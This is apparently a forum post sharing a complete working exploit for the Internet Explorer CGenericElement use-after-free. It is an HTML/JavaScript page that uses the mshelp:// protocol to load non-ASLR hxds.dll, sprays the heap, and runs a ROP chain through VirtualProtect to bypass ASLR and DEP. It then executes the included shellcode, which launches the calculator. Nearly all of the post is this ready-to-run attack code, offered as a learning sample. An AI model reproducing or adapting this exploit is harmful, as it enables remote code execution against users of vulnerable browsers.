Namaste

The following is the CGenericElement exploit using mshelp:// protocol if Visual studio <2010 is installed,
and is a good sample for beginners of exploitation specially ROP chain generation and ASLR+DEP bypass:

Code:
<!--
Exploit Title: "Developers Holocaust".
Developer : "vinnu"
Team : "Legion Of Xtremers"
ASLR+DEP bypass : "mshelp://" protocol can be used if Visual Studio below 2010 is installed.
It loads non ASLR module hxds.dll:
 Base=51BC0000
 Size=000D7000 (880640.)
 Entry=51BDA1D4 hxds.<ModuleEntryPoint>
 Name=hxds
 File version=2.05.50727.42 (RTM.050727-4200)
 Path=C:\Program Files (x86)\Common Files\Microsoft Shared\Help\hxds.dll
 Special Thanx: Garage4Hackers, happy_t3rmin4t0r,l0rd_D34thst0rm,b0nd,fb1h2s...
-->
<!doctype html>
<head>
<script>
var virtable = "alfabetagammad\u1020\u0c10".substring(0x0e,0x20);//"alfabetagammad\u1020\u0c10".substring(0x0e,0x20);
function paint()	{
	var highlim = 300;//1600;
	var bsize = 0x040000;var redzone = 0x20//0x48;
	var halloween =  "\uC876\u51BD"//"\u0102\u0103"	// pop eax;ret
					+"\u105a\u0c10"//"\u0104\u0105"// popped in eax
					+"\u3838\u51C0"//"\u0106\u0107"// and word ptr ds:[eax],0;xor eax,eax,ret8;
					+"\uC876\u51BD"//"\u0108\u0109"//pop eax,ret
					+"\u010a\u010b"
					+"\u110b\u110c"
					+"\u105e\u0c10"//"\u010e\u010f"// popped in eax
					+"\u3838\u51C0"//"\u0110\u0111"// and word ptr ds:[eax],0;xor eax,eax,ret8;
					+"\uC876\u51BD"//"\u0112\u0113"// pop eax,ret
					+"\u1114\u1115"
					+"\u111c\u111d"
					+"\u1158\u51BC"//"\u1158\u51BC"//"\u111e\u111f"// popped in eax : &VirtualProtect.
					+"\uD6B0\u51BC"//"\u10a0\u0c10"//"\u1120\u1121"	// call [eax];pop edi;pop esi;ret10
					+"\u1094\u0c10"//"\u1122\u1123"	// Address
					+"\u4096\u1123"//"\u1122\u1123"	// Size
					+"\u0040\u1125"//"\u1124\u1125"// PAGE_READWRITE_EXECUTE
					+"\u1020\u0c10"//"\u1126\u1127"	// OldProtection
					+"\u1128\u1129"
					+"\u112a\u112b"
					+"\u1094\u0c10"//"\u112c\u112d" // ASLR Bypassed, goto Shellcode.
					+"\u112e\u112f" 
					+"\u1130\u1131"
					+"\u1132\u1133"
					+"\u1134\u1135"
					+"\u1136\u1137"
					+"\u1138\u1139"
					+"\u113a\u113b"
					+"\u113c\u113d"
					+"\u27bf\u51bc"//"\u113e\u113f"	// xchg eax,esp;ret
/*					+"\u1140\u1141"
					+"\u1142\u1143"
					+"\u1144\u1145"
					+"\u1146\u1147"
					+"\u116b\u116c"
					+"\u116d\u116e"
					+"\u116f\u1170"
					+"\u1171\u1172"
					+"\u1173\u1174"
					+"\u1175\u1176"
					+"\u1177\u1178"
					+"\u1179\u117a"
*/					//Shellcode
					// Calc shellcode:
					+"\u9191\u9191\u9191\u9191\uceba\u11fa\u291f\ub1c9\udb33\ud9ce\u2474\u5ef4\u5631\u030e\u0e56\u0883\uf3fe\u68ea\u7a17\u9014\u1de8\u759c\u0fd9\ufefa\u8048\u5288\u6b61\u46dc\u19f2\u69c9\u94b3\u442f\u1944\u0af0\u3b86\u508c\u9bdb\u9bad\udd2e\uc1ea\u8fc1\u8ea3\u2070\ud2c7\u4148\u5907\u39f0\u9d22\uf385\ucd2d\u8f36\uf566\ud73d\u0456\u0b91\u4faa\uf89e\u4e58\u3176\u61a0\u9eb6\u4e9f\ude3b\u68d8\u95a4\u8b12\uae59\uf6e0\u3b85\u50f5\u9b4d\u61dd\u7a82\u6d95\u086f\u71f1\udd6e\u8d89\ue0fb\u045d\uc6bf\u4d79\u661b\u2bdb\u97ca\u933b\u3db3\u3137\u44a7\u5f1a\uc436\u2620\ud638\u082a\ue751\uc7a1\uf826\uac63\u1ac9\ud8a6\u8361\u6123\u34ec\ua59e\ub709\u552b\ua7ee\u5059\u6faa\u28b1\u05a3\u9fb5\u0fc4\u7ed6\ud357\ue537\u76df\u4148";
		/*			+"\ucccc\ucccc\ucccc\ucccc\u4141\u4141"
					+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
					+"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB";
		*/
    while(halloween.length < 0x200) {halloween += virtable;}
	airbreeze = halloween.substring(0,0x100);
	while (airbreeze.length<0x60000) {airbreeze += airbreeze}
	var ropway = airbreeze.substring(0, 0x40000 - redzone);
    var greenCodec = new Array();
	for (var iter=0;iter<highlim;iter++){
        greenCodec.push(document.createElement("div"));
    }
	for (var iter=0;iter<highlim;iter++){
		greenCodec[iter].className =  ropway;
	}
}
function ignite()	{
//	var sobj = document.createElement("img");
//	sobj.src="ms-help://MS.VSCC.v80/MS.Dexplore.v80.en/dv_dexplore/html/92b51076-8841-45a2-8e2b-9165146c5c23.htm";
//	document.body.appendChild(sobj);
	var alfa = new Array();
	var nsize = 0x20;
	for(var as=0;as<0x1000;as++)	{
		alfa.push(document.createElement("div"));
	}
    f0 = document.createElement('span');
    document.body.appendChild(f0);
    f1 = document.createElement('span');
    document.body.appendChild(f1);
    f2 = document.createElement('span');
    document.body.appendChild(f2);
    document.body.contentEditable="true";
    f2.appendChild(document.createElement('datalist'));
    f1.appendChild(document.createElement('span'));
    f1.appendChild(document.createElement('table'));
    try{
        f0.offsetParent=null;
    }catch(e) {}
	f2.innerHTML="";
    f0.appendChild(document.createElement('hr'));
    f1.innerHTML="";
	CollectGarbage();
	a = document.getElementById('myanim');
	
	for(var as = 0;as<100/*0x1000*/;as++)	{
		alfa[as].title = unescape("%u1020%u0c10"/*"%u4140%u4141*/+"%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u4155%u4156%u4157%u4158%u4159%u415a%u415b").substr(0,nsize);
	}
	paint();
	
	alert(1);
//	window.location.reload();
	//[0x5FFF031C]
	a.values = alfa[4].title;
}
function returnTrue()	{return true;}
</script>
</head>
<body onload="eval(ignite());">
    <t:ANIMATECOLOR id="myanim"/>
	<script src="ms-help://MS.VSCC.v80/MS.Dexplore.v80.en/dv_dexplore/html/92b51076-8841-45a2-8e2b-9165146c5c23.htm" onerror="returnTrue();" />	
</body>    
</html>
<!------Call Flow:
113f113e
01020103
01060107
01090108
01110110
01120113
011f011e
112d112c :->ASLR Bypassed.
-------->

..."vinnu"